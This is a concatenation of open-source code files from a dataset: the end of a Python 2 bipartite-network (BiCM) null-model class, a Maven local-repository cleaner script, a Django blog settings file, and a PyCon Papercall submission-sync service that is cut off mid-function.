x_i = \exp(-\\theta_i).
Depending on the solver, keyword arguments ``kwargs`` can be passed to
the solver. Please refer to the `scipy.optimize.root documentation
<https://docs.scipy.org/doc/scipy-0.19.0/reference/generated/
scipy.optimize.root.html>`_ for detailed descriptions.
The default solver is the modified Powell method ``hybr``. Least-squares
can be chosen with ``method='lm'`` for the Levenberg-Marquardt approach.
.. note::
It can happen that the solver ``method`` used by ``scipy.root``
does not converge to a solution.
In this case, please try another ``method`` or different initial
conditions and refer to the `scipy.optimize.root documentation
<https://docs.scipy.org/doc/scipy-0.19.0/reference/generated/
scipy.optimize.root.html>`_.
:param x0: initial guesses for the solutions. The first entries are the
initial guesses for the row-nodes, followed by the initial guesses
for the column-nodes.
:type x0: 1d numpy.array, optional
:param method: type of solver, default is ‘hybr’. For other
solvers, see the `scipy.optimize.root documentation
<https://docs.scipy.org/doc/
scipy-0.19.0/reference/generated/scipy.optimize.root.html>`_.
:type method: str, optional
:param jac: Jacobian of the system
:type jac: bool or callable, optional
:param tol: tolerance for termination. For detailed control, use
solver-specific options.
:type tol: float, optional
:param callback: optional callback function to be called at
every iteration as ``callback(self.equations, x)``,
see ``scipy.root`` documentation
:type callback: function, optional
:param options: a dictionary of solver options, e.g. ``xtol`` or
``maxiter``, see scipy.root documentation
:type options: dict, optional
:param kwargs: solver-specific options, please refer to the SciPy
documentation
:returns: solution of the equation system
:rtype: scipy.optimize.OptimizeResult
:raise ValueError: raise an error if not enough initial conditions
are provided
"""
# use Jacobian if the hybr solver is chosen
        if method == 'hybr':
jac = self.jacobian
# set initial conditions
if x0 is None:
x0 = self.dseq / np.sqrt(np.sum(self.dseq))
else:
if not len(x0) == self.dim:
msg = "One initial condition for each parameter is required."
raise ValueError(msg)
# solve equation system
sol = opt.root(fun=self.equations, x0=x0, method=method, jac=jac,
tol=tol, options=options, callback=callback)
# check whether system has been solved successfully
print "Solver successful:", sol.success
print sol.message
if not sol.success:
errmsg = "Try different initial conditions and/or a" + \
"different solver, see documentation at " + \
"https://docs.scipy.org/doc/scipy-0.19.0/reference/" + \
"generated/scipy.optimize.root.html"
print errmsg
return sol
def equations(self, xx):
"""Return the equations of the log-likelihood maximization problem.
Note that the equations for the row-nodes depend only on the
column-nodes and vice versa, see [Saracco2015]_.
:param xx: Lagrange multipliers which have to be solved
:type xx: numpy.array
:returns: equations to be solved (:math:`f(x) = 0`)
:rtype: numpy.array
"""
eq = -self.dseq
for i in xrange(0, self.num_rows):
for j in xrange(self.num_rows, self.dim):
dum = xx[i] * xx[j] / (1. + xx[i] * xx[j])
eq[i] += dum
eq[j] += dum
return eq
def jacobian(self, xx):
"""Return a NumPy array with the Jacobian of the equation system.
:param xx: Lagrange multipliers which have to be solved
:type xx: numpy.array
:returns: Jacobian
:rtype: numpy.array
"""
jac = np.zeros((self.dim, self.dim))
for i in xrange(0, self.num_rows):
# df_c / df_c' = 0 for all c' != c
for j in xrange(self.num_rows, self.dim):
# df_c / dx_c != 0
xxi = xx[i] / (1.0 + xx[i] * xx[j]) ** 2
xxj = xx[j] / (1.0 + xx[i] * xx[j]) ** 2
jac[i, i] += xxj
jac[i, j] = xxi
jac[j, i] = xxj
jac[j, j] += xxi
return jac
def get_biadjacency_matrix(self, xx):
""" Calculate the biadjacency matrix of the null model.
The biadjacency matrix describes the BiCM null model, i.e. the optimal
average graph :math:`<G>^*` with the average link probabilities
:math:`<G>^*_{rc} = p_{rc}` ,
:math:`p_{rc} = \\frac{x_r \\cdot x_c}{1 + x_r\\cdot x_c}.`
:math:`x` are the solutions of the equation system which has to be
solved for the null model.
Note that :math:`r` and :math:`c` are taken from opposite bipartite
node sets, thus :math:`r \\neq c`.
:param xx: solutions of the equation system (Lagrange multipliers)
:type xx: numpy.array
:returns: biadjacency matrix of the null model
:rtype: numpy.array
:raises ValueError: raise an error if :math:`p_{rc} < 0` or
:math:`p_{rc} > 1` for any :math:`r, c`
"""
mat = np.empty((self.num_rows, self.num_columns))
xp = xx[range(self.num_rows, self.dim)]
for i in xrange(self.num_rows):
mat[i, ] = xx[i] * xp / (1 + xx[i] * xp)
# account for machine precision:
mat += np.finfo(np.float).eps
if np.any(mat < 0):
            errmsg = 'Error in get_biadjacency_matrix: probabilities < 0 in ' \
+ str(np.where(mat < 0))
raise ValueError(errmsg)
elif np.any(mat > (1. + np.finfo(np.float).eps)):
            errmsg = 'Error in get_biadjacency_matrix: probabilities > 1 in ' \
+ str(np.where(mat > 1))
raise ValueError(errmsg)
assert mat.shape == self.bin_mat.shape, \
"Biadjacency matrix has wrong dimensions."
return mat
# ------------------------------------------------------------------------------
# Test correctness of results:
# ------------------------------------------------------------------------------
def print_max_degree_differences(self):
"""Print the maximal differences between input network and BiCM degrees.
Check that the degree sequence of the solved BiCM null model graph
corresponds to the degree sequence of the input graph.
"""
        ave_deg_columns = np.sum(self.adj_matrix, axis=0)
ave_deg_rows = np.sum(self.adj_matrix, axis=1)
print "Maximal degree differences between data and BiCM:"
print "Columns:", np.abs(np.max(
self.dseq[self.num_rows:] - ave_deg_columns))
print "Rows:", np.abs(np.max(
self.dseq[:self.num_rows] - ave_deg_rows))
def test_average_degrees(self, eps=1e-2):
"""Test the constraints on the node degrees.
Check that the degree sequence of the solved BiCM null model graph
corresponds to the degree sequence of the input graph.
:param eps: maximum difference between degrees of the real network
and the BiCM
:type eps: float
"""
ave_deg_columns = np.squeeze(np.sum(self.adj_matrix, axis=0))
ave_deg_rows = np.squeeze(np.sum(self.adj_matrix, axis=1))
c_derr = np.where(np.logical_or(
# average degree too small:
ave_deg_rows + eps < self.dseq[:self.num_rows],
# average degree too large:
ave_deg_rows - eps > self.dseq[:self.num_rows]))
p_derr = np.where(np.logical_or(
ave_deg_columns + eps < self.dseq[self.num_rows:],
ave_deg_columns - eps > self.dseq[self.num_rows:]))
# Check row-nodes degrees:
if not np.array_equiv(c_derr, np.array([])):
print '...inaccurate row-nodes degrees:'
for i in c_derr[0]:
print 'Row-node ', i, ':',
print 'input:', self.dseq[i], 'average:', ave_deg_rows[i]
return False
# Check column-nodes degrees:
if not np.array_equiv(p_derr, np.array([])):
print '...inaccurate column-nodes degrees:'
            for i in p_derr[0]:
print 'Column-node ', i, ':',
print 'input:', self.dseq[i + self.num_rows], \
'average:', ave_deg_columns[i]
return False
return True
# ------------------------------------------------------------------------------
# Lambda motifs
# ------------------------------------------------------------------------------
def lambda_motifs(self, bip_set, parallel=True, filename=None,
delim='\t', binary=True, num_chunks=4):
"""Calculate and save the p-values of the :math:`\\Lambda`-motifs.
For each node couple in the bipartite layer specified by ``bip_set``,
calculate the p-values of the corresponding :math:`\\Lambda`-motifs
according to the link probabilities in the biadjacency matrix of the
BiCM null model.
The results can be saved either as a binary ``.npy`` or a
human-readable ``.csv`` file, depending on ``binary``.
.. note::
* The total number of p-values that are calculated is split into
``num_chunks`` chunks, which are processed sequentially in order
to avoid memory allocation errors. Note that a larger value of
``num_chunks`` will lead to less memory occupation, but comes at
the cost of slower processing speed.
* The output consists of a one-dimensional array of p-values. If
the bipartite layer ``bip_set`` contains ``n`` nodes, this means
that the array will contain :math:`\\binom{n}{2}` entries. The
indices ``(i, j)`` of the nodes corresponding to entry ``k`` in
the array can be reconstructed using the method
              :func:`BiCM.flat2triumat_idx`. The number of nodes ``n``
              can be recovered from the length of the array with
              :func:`BiCM.flat2triumat_dim`.
* If ``binary == False``, the ``filename`` should end with
``.csv``. If ``binary == True``, it will be saved in binary NumPy
``.npy`` format and the suffix ``.npy`` will be appended
automatically. By default, the file is saved in binary format.
:param bip_set: select row-nodes (``True``) or column-nodes (``False``)
:type bip_set: bool
:param parallel: select whether the calculation of the p-values should
be run in parallel (``True``) or not (``False``)
:type parallel: bool
:param filename: name of the output file
:type filename: str
:param delim: delimiter between entries in the ``.csv``file, default is
``\\t``
:type delim: str
:param binary: if ``True``, the file will be saved in the binary
NumPy format ``.npy``, otherwise as ``.csv``
:type binary: bool
:param num_chunks: number of chunks of p-value calculations that are
performed sequentially
:type num_chunks: int
:raise ValueError: raise an error if the parameter ``bip_set`` is
neither ``True`` nor ``False``
"""
if (type(bip_set) == bool) and bip_set:
biad_mat = self.adj_matrix
bin_mat = self.bin_mat
elif (type(bip_set) == bool) and not bip_set:
biad_mat = np.transpose(self.adj_matrix)
bin_mat = np.transpose(self.bin_mat)
else:
errmsg = "'" + str(bip_set) + "' " + 'not supported.'
            raise ValueError(errmsg)
n = self.get_triup_dim(bip_set)
pval = np.ones(shape=(n, ), dtype='float') * (-0.1)
# handle layers of dimension 2 separately
if n == 1:
nlam = np.dot(bin_mat[0, :], bin_mat[1, :].T)
plam = biad_mat[0, :] * biad_mat[1, :]
pb = PoiBin(plam)
pval[0] = pb.pval(nlam)
else:
# if the dimension of the network is too large, split the
            # calculations of the p-values in ``m`` intervals to avoid memory
# allocation errors
if n > 100:
kk = self.split_range(n, m=num_chunks)
else:
kk = [0]
# calculate p-values for index intervals
for i in range(len(kk) - 1):
k1 = kk[i]
k2 = kk[i + 1]
nlam = self.get_lambda_motif_block(bin_mat, k1, k2)
plam = self.get_plambda_block(biad_mat, k1, k2)
pv = self.get_pvalues_q(plam, nlam, k1, k2)
pval[k1:k2] = pv
# last interval
k1 = kk[len(kk) - 1]
k2 = n - 1
nlam = self.get_lambda_motif_block(bin_mat, k1, k2)
plam = self.get_plambda_block(biad_mat, k1, k2)
# for the last entry we have to INCLUDE k2, thus k2 + 1
pv = self.get_pvalues_q(plam, nlam, k1, k2 + 1)
pval[k1:] = pv
# check that all p-values have been calculated
# assert np.all(pval >= 0) and np.all(pval <= 1)
if filename is None:
fname = 'p_values_' + str(bip_set)
if not binary:
fname += '.csv'
else:
fname = filename
# account for machine precision:
pval += np.finfo(np.float).eps
self.save_array(pval, filename=fname, delim=delim,
binary=binary)
def get_lambda_motif_block(self, mm, k1, k2):
"""Return a subset of :math:`\\Lambda`-motifs as observed in ``mm``.
Given the binary input matrix ``mm``, count the number of
:math:`\\Lambda`-motifs for all the node couples specified by the
interval :math:`\\left[k_1, k_2\\right[`.
.. note::
* The :math:`\\Lambda`-motifs are counted between the **row-nodes**
of the input matrix ``mm``.
* If :math:`k_2 \equiv \\binom{mm.shape[0]}{2}`, the interval
becomes :math:`\\left[k_1, k_2\\right]`.
:param mm: binary matrix
:type mm: numpy.array
:param k1: lower interval limit
:type k1: int
:param k2: upper interval limit
:type k2: int
:returns: array of observed :math:`\\Lambda`-motifs
:rtype: numpy.array
"""
ndim = mm.shape[0]
# if the upper limit is the largest possible index, i.e. corresponds to
# the node couple (ndim - 2, ndim - 1), where node indices start from 0,
# include the result
if k2 == (ndim * (ndim - 1) / 2 - 1):
flag = 1
else:
flag = 0
aux = np.ones(shape=(k2 - k1 + flag, )) * (-1) # -1 as a test
[i1, j1] = self.flat2triumat_idx(k1, ndim)
[i2, j2] = self.flat2triumat_idx(k2, ndim)
# if limits have the same row index
if i1 == i2:
aux[:k2 - k1] = np.dot(mm[i1, :], mm[j1:j2, :].T)
# if limits have different row indices
else:
k = 0
# get values for lower limit row
fi = np.dot(mm[i1, :], mm[j1:, :].T)
aux[:len(fi)] = fi
k += len(fi)
# get values for intermediate rows
for i in range(i1 + 1, i2):
mid = np.dot(mm[i, :], mm[i + 1:, :].T)
aux[k : k + len(mid)] = mid
k += len(mid)
# get values for upper limit row
if flag == 1:
aux[-1] = np.dot(mm[ndim - 2, :], mm[ndim - 1, :].T)
else:
la = np.dot(mm[i2, :], mm[i2 + 1 : j2, :].T)
aux[k:] = la
return aux
def get_plambda_block(self, biad_mat, k1, k2):
"""Return a subset of the :math:`\\Lambda` probability matrix.
Given the biadjacency matrix ``biad_mat`` with
:math:`\\mathbf{M}_{rc} = p_{rc}`, which describes the probabilities of
row-node ``r`` and column-node ``c`` being linked, the method returns
the matrix
:math:`P(\\Lambda)_{ij} = \\left(M_{i\\alpha_1} \\cdot M_{j\\alpha_1},
M_{i\\alpha_2} \\cdot M_{j\\alpha_2}, \\ldots\\right),`
for all the node couples in the interval
:math:`\\left[k_1, k_2\\right[`. :math:`(i, j)` are two **row-nodes**
of ``biad_mat`` and :math:`\\alpha_k` runs over the nodes in the
opposite layer.
.. note::
* The probabilities are calculated between the **row-nodes** of the
input matrix ``biad_mat``.
* If :math:`k_2 \equiv \\binom{biad\\_mat.shape[0]}{2}`, the
interval becomes :math:`\\left[k1, k2\\right]`.
:param biad_mat: biadjacency matrix
:type biad_mat: numpy.array
:param k1: lower interval limit
:type k1: int
:param k2: upper interval limit
:type k2: int
:returns: :math:`\\Lambda`-motif probability matrix
:rtype: numpy.array
"""
[ndim1, ndim2] = biad_mat.shape
# if the upper limit is the largest possible index, i.e. corresponds to
# the node couple (ndim - 2, ndim - 1), where node indices start from 0,
# include the result
if k2 == (ndim1 * (ndim1 - 1) / 2 - 1):
flag = 1
else:
flag = 0
paux = np.ones(shape=(k2 - k1 + flag, ndim2), dtype='float') * (-0.1)
[i1, j1] = self.flat2triumat_idx(k1, ndim1)
[i2, j2] = self.flat2triumat_idx(k2, ndim1)
# if limits have the same row index
if i1 == i2:
paux[:k2 - k1, :] = biad_mat[i1, ] * biad_mat[j1:j2, :]
# if limits have different indices
else:
k = 0
# get values for lower limit row
fi = biad_mat[i1, :] * biad_mat[j1:, :]
paux[:len(fi), :] = fi
k += len(fi)
# get values for intermediate rows
for i in range(i1 + 1, i2):
mid = biad_mat[i, :] * biad_mat[i + 1:, :]
paux[k : k + len(mid), :] = mid
k += len(mid)
# get values for upper limit row
if flag == 1:
paux[-1, :] = biad_mat[ndim1 - 2, :] * biad_mat[ndim1 - 1, :]
else:
la = biad_mat[i2, :] * biad_mat[i2 + 1:j2, :]
paux[k:, :] = la
return paux
def get_pvalues_q(self, plam_mat, nlam_mat, k1, k2, parallel=True):
"""Calculate the p-values of the observed :math:`\\Lambda`-motifs.
For each number of :math:`\\Lambda`-motifs in ``nlam_mat`` for the node
interval :math:`\\left[k1, k2\\right[`, construct the Poisson Binomial
distribution using the corresponding
probabilities in ``plam_mat`` and calculate the p-value.
:param plam_mat: array containing the list of probabilities for the
single observations of :math:`\\Lambda`-motifs
:type plam_mat: numpy.array (square matrix)
:param nlam_mat: array containing the observations of
:math:`\\Lambda`-motifs
:type nlam_mat: numpy.array (square matrix)
:param k1: lower interval limit
:type k1: int
:param k2: upper interval limit
:type k2: int
:param parallel: if ``True``, the calculation is executed in parallel;
if ``False``, only one process is started
:type parallel: bool
"""
n = len(nlam_mat)
# the array must be sharable to be accessible by all processes
shared_array_base = multiprocessing.Array(ctypes.c_double, n)
pval_mat = np.frombuffer(shared_array_base.get_obj())
# number of processes running in parallel has to be tested.
# good guess is multiprocessing.cpu_count() +- 1
if parallel:
num_procs = multiprocessing.cpu_count() - 1
        else:
            num_procs = 1
self.input_queue = multiprocessing.Queue()
self.output_queue = multiprocessing.Queue()
p_inqueue = multiprocessing.Process(target=self.add2inqueue,
args=(num_procs, plam_mat, nlam_mat,
k1, k2))
p_outqueue = multiprocessing.Process(target=self.outqueue2pval_mat,
args=(num_procs, pval_mat))
ps = [multiprocessing.Process(target=self.pval_process_worker,
args=()) for i in range(num_procs)]
# start queues
p_inqueue.start()
p_outqueue.start()
# start processes
for p in ps:
p.start() # each process has an id, p.pid
p_inqueue.join()
for p in ps:
p.join()
p_outqueue.join()
return pval_mat
def add2inqueue(self, nprocs, plam_mat, nlam_mat, k1, k2):
"""Add elements to the in-queue to calculate the p-values.
:param nprocs: number of processes running in parallel
:type nprocs: int
:param plam_mat: array containing the list of probabilities for the
single observations of :math:`\\Lambda`-motifs
:type plam_mat: numpy.array (square matrix)
:param nlam_mat: array containing the observations of
:math:`\\Lambda`-motifs
:type nlam_mat: numpy.array (square matrix)
:param k1: lower interval limit
:type k1: int
:param k2: upper interval limit
:type k2: int
"""
n = len(plam_mat)
# add tuples of matrix elements and indices to the input queue
for k in xrange(k1, k2):
self.input_queue.put((k - k1, plam_mat[k - k1, :],
nlam_mat[k - k1]))
# add as many poison pills "STOP" to the queue as there are workers
for i in xrange(nprocs):
self.input_queue.put("STOP")
def pval_process_worker(self):
"""Calculate p-values and add them to the out-queue."""
# take elements from the queue as long as the element is not "STOP"
for tupl in iter(self.input_queue.get, "STOP"):
pb = PoiBin(tupl[1])
pv = pb.pval(int(tupl[2]))
# add the result to the output queue
self.output_queue.put((tupl[0], pv))
# once all the elements in the input queue have been dealt with, add a
# "STOP" to the output queue
self.output_queue.put("STOP")
def outqueue2pval_mat(self, nprocs, pvalmat):
"""Put the results from the out-queue into the p-value array."""
# stop the work after having met nprocs times "STOP"
for work in xrange(nprocs):
for val in iter(self.output_queue.get, "STOP"):
k = val[0]
pvalmat[k] = val[1]
def get_triup_dim(self, bip_set):
"""Return the number of possible node couples in ``bip_set``.
:param bip_set: selects row-nodes (``True``) or column-nodes
(``False``)
:type bip_set: bool
:returns: return the number of node couple combinations corresponding
to the layer ``bip_set``
:rtype: int
:raise ValueError: raise an error if the parameter ``bip_set`` is
neither ``True`` nor ``False``
"""
if bip_set:
return self.triumat2flat_dim(self.num_rows)
elif not bip_set:
return self.triumat2flat_dim(self.num_columns)
else:
errmsg = "'" + str(bip_set) + "' " + 'not supported.'
            raise ValueError(errmsg)
def split_range(self, n, m=4):
"""Split the interval :math:`\\left[0,\ldots, n\\right]` in ``m`` parts.
:param n: upper limit of the range
:type n: int
        :param m: number of parts in which the range should be split
        :type m: int
:returns: delimiter indices for the ``m`` parts
:rtype: list
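        For illustration (note the Python 2 integer division),
        ``split_range(10, m=4)`` returns ``[0, 2, 5, 7]``.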
"""
return [i * n / m for i in range(m)]
# ------------------------------------------------------------------------------
# Auxiliary methods
# ------------------------------------------------------------------------------
@staticmethod
def triumat2flat_idx(i, j, n):
"""Convert an matrix index couple to a flattened array index.
Given a square matrix of dimension ``n`` and the index couple
``(i, j)`` *of the upper triangular part* of the matrix, return the
index which the matrix element would have in a flattened array.
.. note::
* :math:`i \\in [0, ..., n - 1]`
* :math:`j \\in [i + 1, ..., n - 1]`
* returned index :math:`\\in [0,\\, n (n - 1) / 2 - 1]`
:param i: row index
:type i: int
:param j: column index
:type j: int
:param n: dimension of the square matrix
:type n: int
:returns: flattened array index
:rtype: int
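        For illustration, in a ``4 x 4`` matrix the entries above the
        diagonal are enumerated row by row::
            >>> BiCM.triumat2flat_idx(0, 1, 4)
            0
            >>> BiCM.triumat2flat_idx(1, 2, 4)
            3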
"""
return int((i + 1) * n - (i + 2) * (i + 1) / 2. - (n - (j + 1)) - 1)
@staticmethod
def triumat2flat_dim(n):
"""Return the size of the triangular part of a ``n x n`` matrix.
:param n: the dimension of the square matrix
:type n: int
:returns: number of elements in the upper triangular part of the matrix
(excluding the diagonal)
:rtype: int
"""
return n * (n - 1) / 2
@staticmethod
def flat2triumat_dim(k):
"""Return the dimension of the matrix hosting ``k`` triangular elements.
:param k: the number of elements in the upper triangular
part of the corresponding square matrix, excluding the diagonal
:type k: int
:returns: dimension of the corresponding square matrix
:rtype: int
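        For illustration, 6 upper triangular elements correspond to a
        ``4 x 4`` square matrix::
            >>> BiCM.flat2triumat_dim(6)
            4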
"""
return int(0.5 + np.sqrt(0.25 + 2 * k))
@staticmethod
def flat2triumat_idx(k, n):
"""Convert an array index into the index couple of a triangular matrix.
        ``k`` is the index of an array of length :math:`\\binom{n}{2}`,
which contains the elements of an upper triangular matrix of dimension
``n`` excluding the diagonal. The function returns the index couple
:math:`(i, j)` that corresponds to the entry ``k`` of the flat array.
.. note::
* :math:`k \\in \left[0,\\ldots, \\binom{n}{2} - 1\\right]`
* returned indices:
* :math:`i \\in [0,\\ldots, n - 1]`
* :math:`j \\in [i + 1,\\ldots, n - 1]`
:param k: flattened array index
:type k: int
:param n: dimension of the square matrix
:type n: int
:returns: matrix index tuple (row, column)
:rtype: tuple
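        For illustration, this inverts :func:`BiCM.triumat2flat_idx`::
            >>> BiCM.flat2triumat_idx(3, 4)
            (1, 2)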
"""
        # row index of array index k in the upper triangular part of the
# square matrix
r = n - 2 - int(0.5 * np.sqrt(-8 * k + 4 * n * (n - 1) - 7) - 0.5)
        # column index of array index k in the upper triangular part of the
# square matrix
c = k + 1 + r * (3 - 2 * n + r) / 2
return r, c
def save_biadjacency(self, filename, delim='\t', binary=False):
"""Save the biadjacendy matrix of the BiCM null model.
The matrix can either be saved as a binary NumPy ``.npy`` file or as a
human-readable ``.csv`` file.
.. note::
* The relative path has to be provided in the filename, e.g.
*../data/pvalue_matrix.csv*.
* If ``binary==True``, NumPy
automatically appends the format ending ``.npy`` to the file.
:param filename: name of the output file
:type filename: str
:param delim: delimiter between values in file
:type delim: str
:param binary: if ``True``, save as binary ``.npy``, otherwise as a
``.csv`` file
:type binary: bool
"""
self.save_array(self.adj_matrix, filename, delim, binary)
@staticmethod
def save_array(mat, filename, delim='\t', binary=False):
"""Save the array ``mat`` in the file ``filename``.
The array can either be saved as a binary NumPy ``.npy`` file or as a
        human-readable ``.csv`` file.
.. note::
* The relative path has to be provided in the filename, e.g.
*../data/pvalue_matrix.csv*.
* If ``binary==True``, NumPy
automatically appends the format ending ``.npy`` to the file.
:param mat: array
:type mat: numpy.array
:param filename: name of the output file
:type filename: str
:param delim: delimiter between values in file
:type delim: str
:param binary: if ``True``, save as binary ``.npy``, otherwise as a
``.csv`` file
:type binary: bool
"""
if binary:
np.save(filename, mat)
else:
np.savetxt(filename, mat, delimiter=delim)
################################################################################
# Main
################################################################################
if __name__ == "__main__":
pass
| mit | 1,499,766,940,394,343,700 | 40.672962 | 80 | 0.568733 | false | 3.909269 | false | false | false |
gdsglgf/toolkit | Python/maven_cleaner.py | 1 | 2058 | import os
import sys
from threading import Thread
try:
from queue import Queue # python 3
from urllib.request import urlretrieve
except:
from Queue import Queue # python 2
from urllib import urlretrieve
home = os.path.expanduser("~")
maven_home = os.path.join(home, '.m2/repository')
print('MAVEN HOME: %s' %maven_home)
def listfiles(path, filter=None):
if os.path.isfile(path) or not os.path.isdir(path):
return []
files = [os.path.join(path, f) for f in os.listdir(path)]
if filter:
files = [f for f in files if filter(f)]
return files
def enqueue(dir_queue, files):
for f in files:
dir_queue.put(f)
def isEnd(files):
for f in files:
if os.path.isdir(f):
return False
return True
def check(path, files, rmdir=False):
if os.path.isfile(path):
return
if rmdir:
jars = listfiles(path, filter=lambda f: f.endswith('.jar'))
if len(jars) == 0:
print('-------------------%s' %path)
for f in files:
print(f)
os.remove(f)
os.rmdir(path)
else:
caches = listfiles(path, filter=lambda f: f.endswith('.lastUpdated'))
for f in caches:
print(f)
os.remove(f)
def clean(num_worker_threads=5, rmdir=False):
dir_queue = Queue()
files = listfiles(maven_home)
enqueue(dir_queue, files)
def worker():
while not dir_queue.empty():
path = dir_queue.get()
files = listfiles(path)
if isEnd(files):
check(path, files, rmdir)
else:
enqueue(dir_queue, files)
dir_queue.task_done()
for i in range(num_worker_threads): # start threads
worker_thread = Thread(target=worker)
worker_thread.daemon = True
worker_thread.start()
dir_queue.join() # block until all tasks are done
	print('')
	print('clean done...')
def download(url, path):
urlretrieve(url, path)
def test_listfiles():
print(listfiles('maven_cleaner.py'))
print(listfiles('.'))
	print([f for f in os.listdir('.') if f.endswith('.txt')])
def test_main():
test_listfiles()
def main():
if len(sys.argv) == 2 and sys.argv[1] == 'T':
clean(rmdir=True)
else:
clean()
if __name__ == '__main__':
# test_main()
main() | mit | -4,245,451,182,434,786,000 | 21.139785 | 71 | 0.662293 | false | 2.784844 | false | false | false |
pycircle/blog_django | src/blog_cms/settings.py | 1 | 4314 | """
Django settings for blog_cms project.
Generated by 'django-admin startproject' using Django 1.8.5.
For more information on this file, see
https://docs.djangoproject.com/en/1.8/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.8/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
from django.utils.translation import ugettext_lazy as _
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.8/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '(v4)3fy!x-u=%rrqdd_n$mo#pf-gx(!p_)f0^n(aez-r-&mfs@'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = (
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'disqus',
'djangobower',
'django_gravatar',
'thumbnailfield',
'blog',
)
# Bower components definition
BOWER_INSTALLED_APPS = (
'uikit#2.24.3',
'jquery#2.2.0',
)
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.locale.LocaleMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'django.middleware.security.SecurityMiddleware',
)
ROOT_URLCONF = 'blog_cms.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [
os.path.join(BASE_DIR, os.path.dirname(__file__), "templates"),
],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
TEMPLATE_CONTEXT_PROCESSORS = (
"django.contrib.auth.context_processors.auth",
"django.template.context_processors.debug",
"django.template.context_processors.i18n",
"django.template.context_processors.media",
"django.template.context_processors.static",
"django.template.context_processors.tz",
"django.contrib.messages.context_processors.messages"
)
WSGI_APPLICATION = 'blog_cms.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.8/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Internationalization
# https://docs.djangoproject.com/en/1.8/topics/i18n/
LANGUAGES = (
('en', _('English')),
('pl', _('Polish')),
)
LOCALE_PATHS = (
os.path.join(os.path.dirname(os.path.abspath(__file__)), 'locale'),
os.path.join(BASE_DIR, 'articles', 'locale'),
)
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.8/howto/static-files/
STATICFILES_FINDERS = (
"django.contrib.staticfiles.finders.FileSystemFinder",
"django.contrib.staticfiles.finders.AppDirectoriesFinder",
"djangobower.finders.BowerFinder" # Needed for django-bower
)
BOWER_COMPONENTS_ROOT = os.path.join(os.path.dirname(BASE_DIR), "components") # Path of bower components
STATIC_URL = '/static/'
STATIC_ROOT = os.path.join(os.path.dirname(BASE_DIR), "static_root")
STATICFILES_DIRS = (
os.path.join(BASE_DIR, os.path.dirname(__file__), "static", "static_files"),
)
MEDIA_URL = '/media/'
MEDIA_ROOT = os.path.join(BASE_DIR, os.path.dirname(__file__), "static", "media")
# Disqus settings
DISQUS_API_KEY = 'FOOBARFOOBARFOOBARFOOBARFOOBARF'
DISQUS_WEBSITE_SHORTNAME = 'foobar' | mit | 2,757,774,071,022,925,300 | 26.83871 | 104 | 0.688456 | false | 3.326137 | false | false | false |
pyconca/2017-web | pyconca2017/pycon_schedule/services.py | 1 | 3713 | import json
import requests
from django.conf import settings
from pyconca2017.pycon_schedule.models import Speaker, Presentation
class PapercallInterface(object):
BASE_URL = 'https://www.papercall.io/api/v1'
EVENT_URL = '/event'
SUBMISSIONS_LIST_URL = '/submissions'
SUBMISSION_GET_URL = '/submissions/{submission_id}'
SUBMISSION_RATINGS_URL = '/submissions/{submission_id}/ratings'
class SubmissionStates(object):
ACCEPTED = 'accepted'
SUBMITTED = 'submitted'
REJECTED = 'rejected'
WAITLIST = 'waitlist'
def __init__(self):
self.client = requests.Session()
self.client.headers.update({'Authorization': settings.PAPERCALL_TOKEN})
def get_submissions(self, state=SubmissionStates.ACCEPTED):
""" Iterator """
url = '{}{}'.format(self.BASE_URL, self.SUBMISSIONS_LIST_URL)
params = {
'per_page': 100,
'page': 0,
'order': 'created_at',
}
if state:
params['state'] = state
while True:
params['page'] += 1
response = self.client.get(url, params=params)
response_pagination = json.loads(response.headers.get('x-pagination'))
data = response.json()
for item in data:
yield item
if response_pagination['last_page']:
break
class PresentationService(object):
def __init__(self):
self.papercall = PapercallInterface()
def sync_proposals(self, update=False):
"""
Sync Papercall submissions with the database.
:param update: If True, all values will be updated from Papercall.
:return:
"""
for submission in self.papercall.get_submissions():
speaker_data = self._submission_to_speaker_data(submission)
talk_data = self._submission_to_presentation_data(submission)
speaker = self._sync_speaker(speaker_data, update=update)
talk_data['speaker'] = speaker
self._sync_presentation(talk_data, update=update)
def _submission_to_speaker_data(self, submission):
profile = submission['profile']
return {
'full_name': profile['name'],
'bio': profile['bio'],
'twitter_username': profile['twitter'],
'company_name': profile['company'],
'url': profile['url'],
'shirt_size': profile['shirt_size'],
'email': profile['email'],
'location': profile['location'],
}
def _sync_speaker(self, speaker_data, update=False):
if update:
speaker = Speaker.objects.update_or_create(email=speaker_data['email'], defaults=speaker_data)[0]
else:
speaker = Speaker.objects.get_or_create(email=speaker_data.pop('email'), defaults=speaker_data)[0]
return speaker
def _submission_to_presentation_data(self, submission):
talk = submission['talk']
return {
'papercall_id': submission['id'],
'title': talk['title'],
'description': talk['description'],
'notes': talk['notes'],
'abstract': talk['abstract'],
'audience_level': talk['audience_level'],
'presentation_format': talk['talk_format'],
}
def _sync_presentation(self, data, update=False):
